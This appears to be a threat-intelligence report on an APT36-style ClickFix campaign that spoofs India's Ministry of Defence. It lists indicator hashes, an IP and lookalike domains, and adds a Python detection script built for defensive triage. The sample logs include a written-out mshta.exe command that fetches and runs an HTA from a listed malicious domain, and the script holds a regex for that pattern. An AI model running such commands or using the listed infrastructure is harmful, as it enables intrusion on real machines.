APT36-Style ClickFix Attack Spoofs Indian Ministry to Target Windows & Linux

May 6, 2025, 8:11 p.m.

Description

A recent campaign attributed to APT36 has been observed spoofing India's Ministry of Defence to deliver cross-platform malware. The attackers used a ClickFix-style infection chain that mimicked government press releases and staged payloads on a compromised .in domain. The campaign targeted both Windows and Linux users and relied on clipboard-based execution, in which the victim is induced to paste and run a command. On Windows, the pasted command invoked mshta.exe to execute a heavily obfuscated HTA file; on Linux, it attempted to execute a shell script. The tradecraft observed, including government-themed lures, HTA-based delivery, and decoy documents, aligns with known APT36 tactics. This activity demonstrates the continued evolution of ClickFix techniques in new contexts.
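The following triage script is an added example and is not part of the report or any tooling the report describes. It sweeps a batch of constructed log lines (a simple key=value format assumed here, not any vendor's real format) for the indicators listed on this page, matches subdomains of the listed domains, and flags the Windows ClickFix pattern the report describes: mshta.exe launched with a remote URL rather than a local HTA. The sample hostnames under the listed domains, the workstation names and the file path are constructed for the demonstration.

```python
import re
from typing import Dict, List, Optional

# Indicators taken from the report above; these are the only page-sourced values.
IOC_HASHES = {"7087e5f768acaad83550e6b1b9696477089d2797e8f6e3f9a9d69c77177d030e"}
IOC_IPS = {"185.117.90.212"}
IOC_DOMAINS = {
    "email.gov.in.avtzyu.store",
    "trade4wealth.in",
    "drdosurvey.info",
    "avtzyu.store",
    "email.gov.in.drdosurvey.info",
}

# Heuristic for the ClickFix pattern described in the report: mshta.exe given an
# http(s) URL on its command line. The exact command shape is an assumption; the
# report only states that mshta.exe ran a remote, obfuscated HTA.
MSHTA_REMOTE = re.compile(r"\bmshta(?:\.exe)?\b[^\n]*?\bhttps?://", re.IGNORECASE)


def domain_matches(host: str) -> Optional[str]:
    """Return the most specific listed domain that `host` equals or sits under, else None."""
    host = host.lower().rstrip(".")
    for d in sorted(IOC_DOMAINS, key=len, reverse=True):
        if host == d or host.endswith("." + d):
            return d
    return None


def is_mshta_remote_hta(cmdline: str) -> bool:
    """True when mshta is invoked with a remote URL (local .hta paths do not match)."""
    return bool(MSHTA_REMOTE.search(cmdline))


def parse_kv_line(line: str) -> Dict[str, str]:
    """Parse the constructed key=value log format; quoted values may contain spaces."""
    rec = {}
    for key, val in re.findall(r'(\w+)=("[^"]*"|\S+)', line):
        rec[key] = val[1:-1] if val.startswith('"') else val
    return rec


def host_of(value: str) -> str:
    """Reduce a URL or bare host to its hostname (port stripped)."""
    if "://" in value:
        value = value.split("://", 1)[1].split("/", 1)[0]
    return value.split(":", 1)[0]


def triage(lines: List[str]) -> List[Dict[str, str]]:
    """Return one alert per indicator hit or mshta-remote hit across the log batch."""
    alerts = []
    for n, line in enumerate(lines, 1):
        rec = parse_kv_line(line)
        host = rec.get("host", "?")
        for field in ("query", "dst", "url"):
            val = rec.get(field)
            if not val:
                continue
            h = host_of(val)
            if h in IOC_IPS:
                alerts.append({"line": n, "host": host, "reason": "ioc_ip", "indicator": h})
            else:
                d = domain_matches(h)
                if d:
                    alerts.append({"line": n, "host": host, "reason": "ioc_domain", "indicator": d})
        if rec.get("sha256", "").lower() in IOC_HASHES:
            alerts.append({"line": n, "host": host, "reason": "ioc_hash", "indicator": rec["sha256"]})
        if "cmdline" in rec and is_mshta_remote_hta(rec["cmdline"]):
            alerts.append({"line": n, "host": host, "reason": "mshta_remote_hta", "indicator": rec["cmdline"]})
    return alerts


# Constructed sample telemetry: DNS, proxy, process-creation and file events.
SAMPLE_LOGS = [
    'ts=2025-05-06T10:02:11Z type=dns host=WS01 query=email.gov.in.drdosurvey.info',
    'ts=2025-05-06T10:02:12Z type=proxy host=WS01 dst=185.117.90.212 url="https://email.gov.in.drdosurvey.info/press.hta"',
    'ts=2025-05-06T10:02:14Z type=process host=WS01 image="C:\\Windows\\System32\\mshta.exe" cmdline="mshta.exe https://email.gov.in.drdosurvey.info/press.hta"',
    'ts=2025-05-06T10:05:00Z type=dns host=WS02 query=cdn.avtzyu.store',
    'ts=2025-05-06T10:06:00Z type=file host=WS02 sha256=7087e5f768acaad83550e6b1b9696477089d2797e8f6e3f9a9d69c77177d030e',
    'ts=2025-05-06T10:07:00Z type=dns host=WS03 query=www.example.org',
    'ts=2025-05-06T10:08:00Z type=process host=WS03 cmdline="mshta.exe C:\\Temp\\installer.hta"',
]

if __name__ == "__main__":
    for a in triage(SAMPLE_LOGS):
        print(f"line {a['line']:>2} {a['host']:<5} {a['reason']:<17} {a['indicator']}")
```

Matching on the parent domain rather than only the exact strings matters here: the listed `email.gov.in.*` hosts are lookalike subdomains, so any other label under `avtzyu.store` or `drdosurvey.info` deserves the same attention. The mshta rule is a behavioural check independent of the indicators and keeps firing after the infrastructure rotates; the local-HTA line in the sample is left alone to show it is not a blanket mshta alert.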

Date

  • Created: May 6, 2025, 7:41 p.m.
  • Published: May 6, 2025, 7:41 p.m.
  • Modified: May 6, 2025, 8:11 p.m.

Indicators

  • 7087e5f768acaad83550e6b1b9696477089d2797e8f6e3f9a9d69c77177d030e
  • 185.117.90.212
  • email.gov.in.avtzyu.store
  • trade4wealth.in
  • drdosurvey.info
  • avtzyu.store
  • email.gov.in.drdosurvey.info

Attack Patterns

Additional Information

  • Defense
  • Government
  • India